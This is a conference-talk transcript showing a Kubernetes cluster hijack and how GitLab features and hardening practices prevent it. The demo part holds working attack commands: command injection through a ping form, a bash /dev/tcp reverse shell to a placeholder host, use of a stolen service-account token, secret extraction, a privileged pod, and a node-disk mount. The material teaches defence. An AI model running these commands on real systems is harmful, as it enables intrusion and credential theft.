Do you know how easy it is to hijack a Kubernetes cluster? Apparently fairly easy. In this talk, Nico will demonstrate how easy it is to hijack a Kubernetes cluster, as well as how following basic security best practices can help protect you from being hijacked. He will also cover how implementing zero trust can prevent malicious workloads from being executed in the hijacked cluster. Nico is a Docker community leader as well as a GitLab Hero, frequently sharing his passion for cloud native and Kubernetes at various conferences and user group events. Nico is available on chat, as are all of our other speakers, so do feel free to chat with Nico, the other speakers, and the GitLab team members right now. Over to you, Nico.

Hey everyone, and welcome to my talk, "How GitLab can save your Kubernetes environment from being hijacked." My name is Nico Meissenzahl. I'm a senior cloud consultant at Witec, and I'm located in Germany. I'm a GitLab Hero, Microsoft MVP, and Docker community leader, and my work is focused on Kubernetes, containers, cloud native, and DevOps technology. The agenda for my talk today: first of all we'll do a demo, and I will show you how easy it can be to hijack a Kubernetes cluster. Then we'll talk about how GitLab can help prevent such attacks, and we'll round up with some general container and Kubernetes security best practices. Before I jump right into the demo, some details on the demo itself: we will access a web application using our browser, then try to inject some code into the container, and from the container inject even further into the Kubernetes cluster, gaining higher privileges and access levels, and see what we can do. Okay, with that, let me switch to my demo application.
So here we basically have our demo application, a small web app. The only thing the application does: I put in an IP address, hit the go button, and the application runs the ping command inside the container and outputs the details of the ping here. Pretty simple. So let's see: we run the ping command, provide an IP address, and get an output. It really looks like it's just the ping command being executed in the container. So maybe there are some security issues here, and maybe we can somehow inject another command. Let's try to inject an echo: we enter the IP address, then a semicolon, then an echo "I was here". Let's see if it works — hit go. And once again we see our command and our ping output, but we also see the output of our echo: "I was here". So what have we learned? We are somehow able to inject another command into our application and get it executed inside the container. Pretty cool. With that, we can try a bit more. Back in the ping app, let's verify whether a shell — a bash — is available in our container. This time we skip the IP address, because we don't want to ping, we just want to inject into the container: we start with the semicolon and run a `which bash` to see whether a bash is available in the container and whether we can execute it. Okay, that also looks good: the output is /bin/bash, so we have a bash available under /bin/bash. Pretty cool so far. With a bash, we are now able to go even further and inject into our container by using a reverse shell — basically opening up a shell in our container, but in reverse. So not like SSH, where you connect to the machine.
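As a side note, the vulnerable pattern behind this is easy to sketch. This is a hypothetical stand-in, not the demo app's actual code (which isn't shown in the talk); the point is the unvalidated interpolation of user input into a shell command line:

```shell
# Hypothetical sketch of the vulnerability — NOT the real demo app code.
handle_ping() {
  # VULNERABLE: "$1" is pasted into the command string unvalidated, so an
  # input like "1.2.3.4; echo I was here" runs a second command after the
  # first. (The real app runs something like: ping -c 4 $input)
  sh -c "echo simulated-ping $1"
}

handle_ping "1.2.3.4"                    # normal use: one command runs
handle_ping "1.2.3.4; echo I was here"   # injection: the echo also executes
```

The fix is the usual one: never build shell command lines from user input; validate the input against an IP-address pattern or call ping without a shell in between.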
And then execute commands — we do it the other way around. We open up a port on a different machine, and then the container connects out to our machine using egress traffic. With this, we get access into the container and get a bash inside of it. So let's try this. For this we of course need a public access point. Let me just clear this up here: I provisioned a virtual machine on Azure with a public IP, so we have an endpoint to connect to. Here we'll use netcat. We need to execute it with sudo rights, and we just open up port 80 with netcat. So now our virtual machine is listening on port 80 on any IP address. Now we only need to inject the reverse shell and start it inside our container so it connects to our virtual machine. This is pretty easy. We use this command: once again we have a semicolon, then we start a bash, and inside that bash we start another bash — but this time we redirect the bash to a TCP address and port, which is the IP address of our virtual machine and the port 80 we just opened up, basically redirecting everything in there. If we now hit the go button, it's loading and loading and loading, so it looks like the application is broken. But let's see if it worked. And here we see we now have a bash open. We're getting some kind of errors here, but it doesn't matter — we have a bash. And if I do an ls, we are in our container. So now we have the reverse shell open into our container, and from here we can dig a bit deeper. We are running on Kubernetes, so we should have a service account available. Let's do an ls: we have a service account, we see our certificate, we get our namespace, and we have our token. So let's try to talk to the Kubernetes API server.
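Written out, the two halves of the reverse shell from a moment ago look roughly like this. The IP is a placeholder from the documentation range, standing in for the Azure VM's public IP, and both commands are kept as strings here so that nothing fires outside a lab:

```shell
# Reverse-shell sketch — run only in a lab you own. The IP below is a
# placeholder (203.0.113.0/24 is reserved for documentation).
LISTENER='sudo nc -lvp 80'   # run on the attacker VM: listen on port 80

# Injected via the text box (after the semicolon): a bash whose
# stdin/stdout/stderr are redirected over TCP back to the listening VM.
PAYLOAD='bash -c "bash -i >& /dev/tcp/203.0.113.10/80 0>&1"'

# Sanity-check that the payload is syntactically valid bash, without running it:
printf '%s\n' "$PAYLOAD" | bash -n
```

The `/dev/tcp/<host>/<port>` path is a bash feature, which is why the demo first checked that a bash exists in the container.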
Maybe we have some access rights. Okay, first of all we need to export some things. First we export the token — just doing a cat on the token file here — and then an echo to see that everything is fine. An echo on the token variable looks good; we have a token. Let's do the same with the certificate — also a cat on that one. We also have a certificate. Pretty fine so far. So let's try to connect to the Kubernetes API and see if we might have some access. We don't have kubectl at the moment, so we need to do it with curl. Here we do a curl, providing a CA file and an authorization header with the bearer token from above, and then we do a GET against our KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT — these are environment variables available inside every container, without anyone exposing them explicitly — plus /api. Let's see if it works. Okay, we get some feedback; at least we don't get a deny. So we have some kind of read access on our Kubernetes API, which is pretty good, because from there we might be able to get further details. Next, let's export the namespace and see which namespace we are running in — the default one, or another one. Okay, doing an echo on the namespace: we have sample-namespace, the namespace our container is running in. Cool. So let's see if we can list the pods in this namespace — maybe our service account has access to list them. Once again a curl, providing our certificate and the bearer token, and this time a GET against /api/v1/namespaces/, with the namespace from our variable above, and then /pods. Let's execute this one. Okay, here we get a forbidden: the status is Failure, and pods is forbidden for user system:serviceaccount:sample-namespace:default.
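Reconstructed, the curl probes from this part of the demo look roughly like this. The mount path and the `KUBERNETES_SERVICE_*` variables are standard in every pod; the block is guarded so it only does something when actually run inside one:

```shell
# Sketch of the in-container API probe. /var/run/secrets/kubernetes.io/
# serviceaccount is the standard service account mount in Kubernetes pods;
# the guard makes this a no-op anywhere else.
SA=/var/run/secrets/kubernetes.io/serviceaccount
if [ -d "$SA" ]; then
  TOKEN=$(cat "$SA/token")
  NAMESPACE=$(cat "$SA/namespace")
  APISERVER="https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"

  # Read-access check against the API root:
  curl --cacert "$SA/ca.crt" -H "Authorization: Bearer $TOKEN" "$APISERVER/api"

  # Try to list pods in our own namespace (403 Forbidden in the demo):
  curl --cacert "$SA/ca.crt" -H "Authorization: Bearer $TOKEN" \
    "$APISERVER/api/v1/namespaces/$NAMESPACE/pods"
fi
```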
So basically we are using the default service account in the sample namespace, and this one does not have access to list pod resources in sample-namespace. And once again we get the HTTP status code, which tells us that we do not have access. So we are not able to list the pods in this namespace. But hey, every Kubernetes cluster has a default namespace, so maybe something was misconfigured there — some roles or role bindings. Let's try whether this service account has access to the default namespace. We do exactly the same command, but instead of providing our namespace we go against the default namespace. Okay, this looks better: we get some feedback, no deny, and we already see pod definitions here. So we have some pods available. Pretty cool — but it's a little hard to read. So let's see if we can get a nicer workflow and whether we're able to install and use kubectl. First of all, let's see which user we are in this container. Ah, cool, we are root, so we have pretty high rights in this container. Another check: can we curl Google? That also works. So in our container we have root access and access to the internet — we can make egress connections. Let's try to just download kubectl; maybe it works, and then we wouldn't need to use curl anymore. We download the latest release, make it executable, and move it to /usr/bin. Okay, the download worked, so we should now have kubectl available. Then let's do a kubectl get pods in the default namespace — we saw we have access there — and see if we get some feedback. And here we go: we have another container, another app, running in the default namespace, and we are at least able to see it here.
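The download steps, collected into one sketch. The dl.k8s.io URL is the pattern the Kubernetes project documents today; the demo may have used a slightly different release URL, and the function is deliberately not invoked here:

```shell
# Fetch the latest stable kubectl (Linux amd64), as in the demo.
# URL pattern per the Kubernetes install docs; requires egress access.
install_kubectl() {
  VERSION=$(curl -Ls https://dl.k8s.io/release/stable.txt)
  curl -LO "https://dl.k8s.io/release/$VERSION/bin/linux/amd64/kubectl"
  chmod +x kubectl
  mv kubectl /usr/bin/kubectl
}

# install_kubectl                       # needs internet access from the pod
# kubectl get pods --namespace default  # the nicer workflow replacing raw curl
```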
So let's dig a bit deeper and check out some of the configuration. Here we do a kubectl get again, output everything as YAML, and grep for environment variables — maybe there are some nice environment variables, usernames, passwords, something like that. Let's see. Oh, okay, we have an environment variable called DB_STRING. It's not in clear text here; it comes from a secret mounted into the container. So we have two options: we either check whether we have access to the secret, or we try an exec into the container and just read the environment variable. Let's try the second one. Here we do a kubectl exec in the default namespace, grepping together the pod name, then run env to get the environment variables and grep for DB_STRING. Let's see if we are able to exec. Hey, cool, it worked — now we have the environment variable and the secret. With this we could now try to connect to the database, export data, at least read data, maybe dump it and upload it somewhere else. Pretty far so far. Cool, so we have the DB string. Let's try something further: let's try to schedule a container in the cluster and see whether we are able to run our own workload in this Kubernetes cluster we shouldn't have access to. We already know that we are able to connect to the internet, so let's try to pull the Ubuntu image from Docker Hub. And of course we don't just want an Ubuntu running with root access — let's also try to run it in privileged mode, which would give us even further access rights. In there we just start a bash, and we start it in the background so that it keeps running and we don't need to care about overriding the entrypoint and things like that. Just executing this one here — also looks good.
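Sketching those steps: the variable name follows the demo, the overrides JSON is one assumed way to ask kubectl for a privileged container, and the whole block is guarded behind a reachable cluster so it is inert elsewhere:

```shell
# Sketch of the inspection and scheduling steps; no-op without a cluster.
if kubectl get namespaces >/dev/null 2>&1; then
  # Grep the pod manifests for environment variables:
  kubectl -n default get pods -o yaml | grep -A 2 "env:"

  # Read DB_STRING straight out of the running container:
  POD=$(kubectl -n default get pods -o name | head -n 1)
  kubectl -n default exec "$POD" -- env | grep DB_STRING

  # Schedule our own privileged pod, kept alive in the background
  # (overrides JSON is an assumed construction for illustration):
  kubectl -n default run hijacked --image=ubuntu \
    --overrides='{"spec":{"containers":[{"name":"hijacked","image":"ubuntu","command":["sleep","infinity"],"securityContext":{"privileged":true}}]}}'
fi
```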
So let's see whether we see the pod: there's the Ubuntu pod we just launched, ten seconds ago, and it's ready and running. Cool, this also worked. So let's do an exec here and open up a /bin/bash in this container — we now jump from our hijacked container into our Ubuntu container. Here we have a full Ubuntu available, we can install tools and so on, and we also have privileged mode. With privileged mode, one option is to mount the file system of our node — the Kubernetes node this pod is running on. So let's do that: we have the mount command, we just grep together the disk from the node and mount it into the container on /tmp. Executing this, and now doing an ls on /tmp to see whether it worked. Cool, here we go: the file system of the Kubernetes node we are running on, and here we have much, much more access. Let's do an ls on /tmp/etc/kubernetes — the /etc/kubernetes directory of our node. And here we see we have an azure.json, for example, which contains secrets and client IDs and so on — how Kubernetes talks to Azure. So we could even pivot further into our public cloud environment. We also get certs, manifests, and other information, with which we could inject even further, or hijack our Kubernetes cluster by starting containers outside of Kubernetes, maybe getting further access to the Kubernetes node and things like that. So we are pretty far into our Kubernetes cluster. Okay, that was the short demo. Basically I wanted to show you how easy it is to get access if there is a security issue in a web application and you have a not really well-protected Kubernetes cluster. Then it's really easy to get further access and to use privileged service accounts, if they are available, to get even further. I'm not a security expert, so this is just basic stuff.
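The node-filesystem trick, sketched. `/dev/sda1` is only a guess at the node's disk device — it varies per node, and in the demo it was grepped from the device list first; the guard keeps this inert without a cluster:

```shell
# From a privileged pod, the host's block devices are visible, so the
# node's root filesystem can simply be mounted. No-op without a cluster.
if kubectl get namespaces >/dev/null 2>&1; then
  kubectl -n default exec hijacked -- /bin/bash -c '
    mount /dev/sda1 /tmp       # device name is node-specific: check lsblk first
    ls /tmp/etc/kubernetes     # node-level config, e.g. azure.json on AKS
  '
fi
```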
If you really know about Linux and Kubernetes and security, you can go even further. So let's sum up. What did we do? First of all, we injected some custom code into the text box of the web application, played around a bit, and then opened up a reverse shell into the container. From there, we used the privileged default service account to inspect secrets and even to schedule a privileged pod. And from there we could have gone even further — very important: with this privileged pod we would be able to access the node, the control plane, or even cloud resources, depending on the Kubernetes configuration. Now, if we had secured this cluster, most of these attacks wouldn't have worked at all. But most of the time, if you are at a customer site or reviewing a cluster, this is basically what you will get: a pretty open Kubernetes cluster. And then you need to make sure it runs securely and the application is secured as well. And this is where GitLab comes into play, because GitLab has many features which can help you prevent lots of these attacks, and that's what I would like to talk about now. First of all, the GitLab features are combined into a whole DevOps strategy. We have different DevOps stages — plan, create, release, protect, monitor, and some others — and in all of those stages GitLab provides you with nice features which help you secure your whole application lifecycle: your application, but also your Kubernetes cluster. So let's get into some details. For the create stage, first just a general best practice: use pair programming. Make sure the code you're committing or merging is as good as possible. If there's an anti-pattern or something, the colleague you're working with can find it directly and you can fix it, even before somebody reviews the merge request, for example.
And to be honest, the security issue we exploited in this application — I'm pretty sure a senior developer would have found it directly. Second: required merge request approvals. This is a GitLab feature where you can make sure that a merge request needs an approval before it gets merged into the main branch, for example, so you can really make sure that somebody reviewed it. That said, it's a Premium or Ultimate feature; optional merge request approvals are available in all GitLab tiers. Then we have the secure stage, with lots of nice features we can use. First of all, we have secret detection: GitLab scans our Git history and finds leaked secrets, passwords, and the like, so we can make sure we do not have any passwords or secrets in our code. We have dependency scanning: GitLab can analyze our dependencies, find vulnerabilities, and make sure we fix them or update our dependencies — this is an Ultimate feature. We have static application security testing (SAST), which analyzes our source code for security issues. This one would have found the security issue in our web application, so we would have caught the bug in our CI pipeline, for example. We have dynamic application security testing (DAST) — going one step further, GitLab analyzes your running application and tries to find security issues; this one is also an Ultimate feature. And the last one, API fuzzing, which also helps protect and test web APIs by fuzzing them — also an Ultimate feature. So we have plenty of features and tools we can use to secure and test our application even before it's deployed into an environment. Then we have the configure stage. The configure stage can help us scan our containers: after we build our container images, we can scan them and make sure they don't include any vulnerabilities or other security issues.
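Most of the scanners just mentioned can be enabled by including GitLab's bundled CI templates — a minimal sketch of a `.gitlab-ci.yml` (the template names are the ones GitLab ships; the Ultimate-tier scanners only take effect with the matching license):

```yaml
# .gitlab-ci.yml — enable the scanners discussed above via GitLab's templates
include:
  - template: Security/Secret-Detection.gitlab-ci.yml
  - template: Security/Dependency-Scanning.gitlab-ci.yml
  - template: Security/SAST.gitlab-ci.yml
  - template: Security/DAST.gitlab-ci.yml
  - template: Security/Container-Scanning.gitlab-ci.yml
```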
And we have Auto DevOps. Auto DevOps is a great feature which basically helps you reduce complexity: it takes all the nice features I just showed you and integrates them as a ready-to-go pipeline, so you get everything out of the box — you just need to enable it. A pretty nice feature, Auto DevOps. But we have even more stages available: the protect stage. Here our application is already running in our Kubernetes cluster, but GitLab still provides us with features we can use. For example, the Web Application Firewall, which monitors and filters HTTP requests and attacks. Based on the web app we saw earlier: the code injection we did — the semicolon and the echo and so on — would have been detected by the Web Application Firewall, and we could have denied the request before it hit our container. We have container host security, also a pretty nice feature. It's based on open source and basically prevents and detects commands and binaries executed in our container. With this we would have seen that somebody was trying to run an echo or start a bash in our container, and we could have denied it. And there's container network security, which is basically the same thing for the network. With this we could make sure that our container is not able to contact Google, or to contact GitHub to download kubectl. And even if we somehow got hold of the database secret — which belongs to a different container — we could have made sure that the container we are in is not able to connect to the database at all. So even with the secret, container network security would have stopped that connection.
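The "this container may not talk to the internet or the database" idea maps onto a standard Kubernetes NetworkPolicy, which is one way to implement what container network security enforces. A minimal default-deny egress sketch, using the demo's namespace name:

```yaml
# Deny all egress traffic for every pod in sample-namespace: with no
# egress rules listed, nothing is allowed out — no Docker Hub, no GitHub,
# no database in another namespace.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-all-egress
  namespace: sample-namespace
spec:
  podSelector: {}
  policyTypes:
    - Egress
```

From there you would add narrow egress rules for only the destinations each workload genuinely needs.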
So these are some of the GitLab features which could have helped in this use case, and which can help you protect your applications and your Kubernetes cluster. But to round up the talk, I would also like to give you some general container and Kubernetes best practices. First of all: understand the manifests you apply to your cluster. The issue we had was a default service account in Kubernetes somehow having access to a different namespace. That's nothing you would normally do, because you shouldn't share service accounts — especially not ones that have privileges to access the Kubernetes API. Most of the time these issues come up because somebody applies a manifest they found on GitHub or in some documentation — manifests that are not production-ready — along with some roles and role bindings. Next, deny untrusted registries: we downloaded the Ubuntu image from Docker Hub, so we could deny Docker Hub and every registry besides our own, for example. We could enforce rootless containers, so that we don't have root access inside our containers. We could enforce read-only file systems at runtime — with a read-only file system, we wouldn't have been able to do most of what we did inside the container. We could deny privileged containers, to make sure nobody is able to mount or work against our Kubernetes nodes. We could have denied egress traffic, so the container cannot talk to Google, or to GitHub to download kubectl. And going even further, where possible we could use distroless containers: containers that don't contain a full Ubuntu distribution or a shell, but only the parts the application needs.
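Several of the practices just listed can be expressed directly in the pod spec; a hedged sketch (the image name is hypothetical, and an admission policy should enforce these settings cluster-wide rather than trusting each manifest):

```yaml
# Pod spec fragment enforcing some of the practices above.
apiVersion: v1
kind: Pod
metadata:
  name: ping-app
spec:
  automountServiceAccountToken: false        # no API token in the pod at all
  containers:
    - name: ping-app
      image: registry.example.com/ping-app:1.0   # hypothetical trusted-registry image
      securityContext:
        runAsNonRoot: true                   # rootless container
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true         # no dropping kubectl into /usr/bin
        privileged: false                    # no mounting node disks
```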
With a distroless container, we would never have been able to start a bash inside our container to get further access to our Kubernetes cluster. So these are some container and Kubernetes best practices — really just the basic ones — but they should give you a better understanding of what is important if you want to run secure workloads on a secured Kubernetes cluster. With this: my slides are available on SlideShare, and all the code and the setup for the demo application are available on GitLab. I also linked the GitLab features, and if you have any questions, feel free to contact me via mail, via Twitter, or anything else. With this, thanks for joining my talk, and have a great day.